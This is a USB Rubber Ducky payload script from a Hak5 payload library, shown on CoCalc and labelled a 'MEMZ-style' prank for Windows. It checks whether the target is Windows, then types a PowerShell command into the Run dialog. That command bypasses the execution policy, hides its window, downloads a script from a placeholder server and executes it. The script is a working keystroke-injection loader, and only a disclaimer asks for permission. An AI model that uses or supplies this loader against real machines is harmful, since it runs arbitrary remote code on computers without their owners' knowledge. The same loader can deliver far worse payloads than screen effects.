CoCalc -- Payload.txt

GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/prank/MEMZ-with-Powershell/Payload.txt
²⁹⁶⁸ views

1
REM Author:      beigeworm 
2
REM Title:       MEMZ-with-Powershell
3
REM Target:      Windows 10/11 
4
REM Description: This script displays various screen effects similar to the classic MEMZ trojan (Non-Destructive).
5
REM Description: Hold ESCAPE for 5 seconds to kill the script.
6

7
REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**
8

9
REM Replace the URL for your own hosted .ps1 raw file.
10
DEFINE #SCRIPTURL https://yourserver.com/rawfile/Powershell-MEMZ.ps1
11

12
REM Funtion to detect Windows is ready for keystrokes
13
EXTENSION PASSIVE_WINDOWS_DETECT
14
    REM VERSION 1.1
15
    REM AUTHOR: Korben
16

17
    REM CONFIGURATION:
18
    DEFINE #MAX_WAIT 150
19
    DEFINE #CHECK_INTERVAL 20
20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
21
    DEFINE #NOT_WINDOWS 7
22

23
    $_OS = #NOT_WINDOWS
24

25
    VAR $MAX_TRIES = #MAX_WAIT
26
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
27
        DELAY #CHECK_INTERVAL
28
        $MAX_TRIES = ($MAX_TRIES - 1)
29
    END_WHILE
30
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
31
        $_OS = WINDOWS
32
    END_IF
33

34
END_EXTENSION
35

36
IF $_OS != WINDOWS
37
    LED_R                                                                                                                                       
38
    STOP_PAYLOAD 
39
END_IF
40

41
REM Main bad-USB script
42
LED_G
43
GUI r
44
DELAY 750
45
STRINGLN powershell -Ep Bypass -W H -C IRM #SCRIPTURL | iex
46

47

48

Product

Resources

Company